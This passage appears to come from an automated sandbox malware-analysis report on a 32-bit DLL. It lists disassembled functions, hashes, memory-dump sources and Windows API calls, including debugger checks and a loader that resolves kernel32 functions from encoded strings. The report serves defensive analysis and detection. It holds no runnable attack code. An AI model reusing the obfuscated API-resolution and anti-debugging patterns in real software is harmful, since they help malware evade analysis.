              • Instruction Fuzzy Hash: 2EF0E07554463C5BEB114EF5C805B5A374C9F42768F7A8165DC14D6250DF28D4138AE3
              Function 6BEE1000 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 297 6bee1000-6bee100e 298 6bee1012-6bee1019 call 6bee4402 ExitProcess 297->298 299 6bee1010-6bee101f 297->299
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: f7dc9035dbaf2b48a95d61ee83f7f2e2a09dd5245d2595eb1be4c53e6f1efcf8
              • Instruction ID: 4a4af57ec910b0e09b3e28672bcff56d3754f426284e6352512c9bad8d390aad
              • Opcode Fuzzy Hash: f7dc9035dbaf2b48a95d61ee83f7f2e2a09dd5245d2595eb1be4c53e6f1efcf8
              • Instruction Fuzzy Hash: 95D01274645258EBCB009BF4C806B4D77F8EB09715F60C065E51697240D638AE46A533

              Non-executed Functions

              Function 6BEF612B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 02afc7e41b57cda4c9ab53833dc7700da782621da8ceeb577398a80d975fdffd
              • Instruction ID: 970f0a05ce7f9a414bc398839467f00a4f2d3459c012f8739ae429416a295b1b
              • Opcode Fuzzy Hash: 02afc7e41b57cda4c9ab53833dc7700da782621da8ceeb577398a80d975fdffd
              • Instruction Fuzzy Hash: 19D24C71E086288FDB65CE28CD407DAB7B9EB85305F2441EAD40DE7240E779AE86CF41
              Function 6BEF5C80 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction ID: e7b26376c129ad373e760ce0663c03027cf23c349bd385bdc794c062c32d1e7b
              • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction Fuzzy Hash: DA023D71E012199FDB14CFA8C89069EFBF5FF48318F2482A9D919E7380D735A952CB90
              Function 6BEE53EE Relevance: 6.1, APIs: 4, Instructions: 70COMMON
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6BEE53FA
              • IsDebuggerPresent.KERNEL32 ref: 6BEE54C6
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BEE54DF
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BEE54E9
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 56d914645bdd6b1a8ca3346c77b85ea04fd50f0422f7684cc950bf7e45b9d8d4
              • Instruction ID: f7c83e5fb615dffff9bddebc182157f3c1735c5e33a1dca2442c3201b871e158
              • Opcode Fuzzy Hash: 56d914645bdd6b1a8ca3346c77b85ea04fd50f0422f7684cc950bf7e45b9d8d4
              • Instruction Fuzzy Hash: 273105B5D0531C9ADF21DFA0D8497CDBBB8AF08304F2041EAE50DAB240EB749A858F55
              Function 6BEEDCFD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6BEE1775), ref: 6BEEDDF5
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6BEE1775), ref: 6BEEDDFF
              • UnhandledExceptionFilter.KERNEL32(6BEE144D,?,?,?,?,?,6BEE1775), ref: 6BEEDE0C
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 2e89f5f3aa1dc7669b6bb70e43ec92fe97cc7b59f54617979575881457e3551a
              • Instruction ID: 086008b5dee53529c7de1f0fb388ad203c2a0f122fa18e292560cc6391698186
              • Opcode Fuzzy Hash: 2e89f5f3aa1dc7669b6bb70e43ec92fe97cc7b59f54617979575881457e3551a
              • Instruction Fuzzy Hash: A731D675D4121CABCB21DF24D889B8DBBF8BF48314F6081DAE41CA7250E7749B868F54
              Function 6BEFB869 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6BEFB864,?,?,00000008,?,?,6BEFB467,00000000), ref: 6BEFBA96
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 7202fcf58965090ec4a0e20c67db82cf0f7d75bc8951d73a6e3a3b32d70e385d
              • Instruction ID: 07fc3ab4c6649d87336303331d0f28e2c484fbd7c54f9ae22bbe6b50a9cbebfe
              • Opcode Fuzzy Hash: 7202fcf58965090ec4a0e20c67db82cf0f7d75bc8951d73a6e3a3b32d70e385d
              • Instruction Fuzzy Hash: 34B11871A10609DFD705CF28C486B957BE4FF45368F258698E8A9CF2A5C339E992CB40
              Function 6BEE55EB Relevance: 1.6, APIs: 1, Instructions: 147COMMON
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6BEE5601
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: d3ccee79446dbc68989d00d8ffd40ecb4795e72c18de7e97081568aec8d96b03
              • Instruction ID: 28d3b672670ff75bb3e8beb46a9f2c9ca79a3ca26bb53fd64cb3aa151c87cea8
              • Opcode Fuzzy Hash: d3ccee79446dbc68989d00d8ffd40ecb4795e72c18de7e97081568aec8d96b03
              • Instruction Fuzzy Hash: E4517EB2A2120ADFDB04CF54C49179ABBF0FB45318F20816AE522EB360D378D995CF60
              Function 6BEF38F4 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 19e9ff3dee0b0b4d42340535bef5aac96fb09f176a421619798897ba6b898b27
              • Instruction ID: 73ccb2fb1b2fa660552e0acb952fc6a8dd60f4402c50ffa95e987d765b93c500
              • Opcode Fuzzy Hash: 19e9ff3dee0b0b4d42340535bef5aac96fb09f176a421619798897ba6b898b27
              • Instruction Fuzzy Hash: B14193B580521CAEDB20DF79CC89AAABBBDEF45304F2442DDE41DE3200D6389E858F50
              Function 6BEF4AF5 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: aa8cc0f9b3fdab27f4107e3ec03ec9307674d7635274b6ae8779011c549468a8
              • Instruction ID: 53fdae5f9944a589624551d859993a7b85e6de74df78cff944dde79aaf4c56bf
              • Opcode Fuzzy Hash: aa8cc0f9b3fdab27f4107e3ec03ec9307674d7635274b6ae8779011c549468a8
              • Instruction Fuzzy Hash: E8A02238B22208CFCF808F30830830C3EEEBB8B2C230080ACE00AC0030EB30C008AB00
              Function 6BEEB71C Relevance: .4, Instructions: 385COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7dd63740743a981e2fcc89f0f2bf0b8504e396972999ec9703a5b3b0e368837d
              • Instruction ID: ee19f564bb7f11d110176e5629ce9388af219690a38e8870eb4fadb2741dd7ad
              • Opcode Fuzzy Hash: 7dd63740743a981e2fcc89f0f2bf0b8504e396972999ec9703a5b3b0e368837d
              • Instruction Fuzzy Hash: 5FD16830E007068FCB14CF78C5D0A6AB7B1FF49718F208699D56AAB790D739A953CB64
              Function 6BEEB3BD Relevance: .3, Instructions: 333COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d4017e567a05e3d41d93c6b1b8e60124c11f6b9d9bb1a7b6ff27272e21bf6c2b
              • Instruction ID: 067a32f80c3eaaabab1c2251fb2aa54ec639e3deab94f27d79bc789986e13d00
              • Opcode Fuzzy Hash: d4017e567a05e3d41d93c6b1b8e60124c11f6b9d9bb1a7b6ff27272e21bf6c2b
              • Instruction Fuzzy Hash: AFC1CC70D047068ECB11CE78C5D0A6ABBB2AF06318F30469DD5629B7A1E339E957CB71
              Function 6BEEB07B Relevance: .3, Instructions: 318COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 600118be551a977c9f591427eb2f7594935b95adf780c9e5c4c7b75ae6968854
              • Instruction ID: dd006467c307b5d911e14ed14622929eeeb9bb6eed78fcf971fb7c3622637e40
              • Opcode Fuzzy Hash: 600118be551a977c9f591427eb2f7594935b95adf780c9e5c4c7b75ae6968854
              • Instruction Fuzzy Hash: 8BB1AD70E0470ACBCB148E78C9D57AEBBB5AF05318F30065DE4A297790D729A613CB75
              Function 6BEE171F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 174libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              • kernel32.dll, xrefs: 6BEE1755
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6BEE1765
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6BEE17F6
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6BEE1887
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: de9b71a50fb63802bbce5ddf7852e42c0219d84af34d3cf32afb87f181545708
              • Instruction ID: ea703b171dc02b2bd3026e361fc17db7c5dc75ff21e6399561e12f399a046e3c
              • Opcode Fuzzy Hash: de9b71a50fb63802bbce5ddf7852e42c0219d84af34d3cf32afb87f181545708
              • Instruction Fuzzy Hash: 13610375C04258DFDB21CBF8DC85A9CBBB8BF09308F24416DE554A7252EB39994ACF21
              Function 6BEF8279 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 6BEF7FC0: CreateFileW.KERNEL32(00000000,00000000,?,6BEF8322,?,?,00000000,?,6BEF8322,00000000,0000000C), ref: 6BEF7FDD
              • GetLastError.KERNEL32 ref: 6BEF838D
              • __dosmaperr.LIBCMT ref: 6BEF8394
              • GetFileType.KERNEL32(00000000), ref: 6BEF83A0
              • GetLastError.KERNEL32 ref: 6BEF83AA
              • __dosmaperr.LIBCMT ref: 6BEF83B3
              • CloseHandle.KERNEL32(00000000), ref: 6BEF83D3
              • CloseHandle.KERNEL32(00000000), ref: 6BEF8520
              • GetLastError.KERNEL32 ref: 6BEF8552
              • __dosmaperr.LIBCMT ref: 6BEF8559
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 0255d4fa1dbd0471d6d5581c194ed57a9067d27f4d072306ce7a585a794df0a4
              • Instruction ID: a6a0b8b8d26e3237c5e3937c86d7e64fe71332746a78f2c5801d76f27ee5eb56
              • Opcode Fuzzy Hash: 0255d4fa1dbd0471d6d5581c194ed57a9067d27f4d072306ce7a585a794df0a4
              • Instruction Fuzzy Hash: EFA13732A14158DFCF099F78DC51BAD3BB9AB47328F24028DE8119B3A1D7389917CB91
              Function 6BEE6ADA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6BEE6BF9
              • ___TypeMatch.LIBVCRUNTIME ref: 6BEE6D07
              • _UnwindNestedFrames.LIBCMT ref: 6BEE6E59
              • CallUnexpected.LIBVCRUNTIME ref: 6BEE6E74
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 8221310128106b20b0cd9f24306011bf27edf046c9f44b37974ef4cd4cb9ea42
              • Instruction ID: 71e9b5deaab7fae6435efa1dfab04694442d0a7c775bb678ed0e9ab1662c8266
              • Opcode Fuzzy Hash: 8221310128106b20b0cd9f24306011bf27edf046c9f44b37974ef4cd4cb9ea42
              • Instruction Fuzzy Hash: C4B15871C00219EFCF05DFA4C88099EBBB5FF04318F61459AEA146B255D739EA62CBB1
              Function 6BEF068D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction ID: b89e372c04372a7f7165d1fa835049130c9ef1d5b8231c1a8fb6a34b0ea68cef
              • Opcode Fuzzy Hash: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction Fuzzy Hash: 1DB11872A043959FEB118E64CC81BAE7BB9EF45714F344195E944AB383E3789913CBA0
              Function 6BEE6540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6577
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6BEE657F
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6608
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BEE6633
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6688
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: 84a7f6c4e78a21bd895b65ba6ae308f725a51be348e26f4567446afa47d3429c
              • Instruction ID: 8395ef08dd339fc638ec0a34b910564bb91558c3da8e445a3c3a49b457e7b47b
              • Opcode Fuzzy Hash: 84a7f6c4e78a21bd895b65ba6ae308f725a51be348e26f4567446afa47d3429c
              • Instruction Fuzzy Hash: B7419A74E10209AFCF10CF68C840A9E7BB5BF46318F208599E918AB355DB39D917CBA0
              Function 6BEF1703 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,6BEEC75A,?,316303B8,?,6BEF1812,6BEE7D84,B586E81C,00000000,6BEEC75A), ref: 6BEF17C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 732f4b8291b87d0b2175d59baa47401adb536aab6eb0fd137d2c0658e741c184
              • Instruction ID: 89f6fb8326dcb3b3cfc839416f3abf5212b00683fd7cc2c3d8ee8602b28d6b31
